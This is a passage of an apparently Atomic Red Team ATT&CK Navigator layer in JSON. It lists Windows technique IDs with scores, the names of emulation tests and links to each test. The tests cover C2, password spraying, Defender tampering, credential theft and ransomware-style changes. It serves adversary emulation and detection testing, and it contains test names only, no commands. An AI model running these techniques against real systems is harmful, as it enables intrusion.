Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl 
Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain 
Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows 
HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error 
Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use 
microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the 
Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn 
Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double 
Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- 
Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":12,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n- RustDesk Files Detected Test on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL 
file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View 
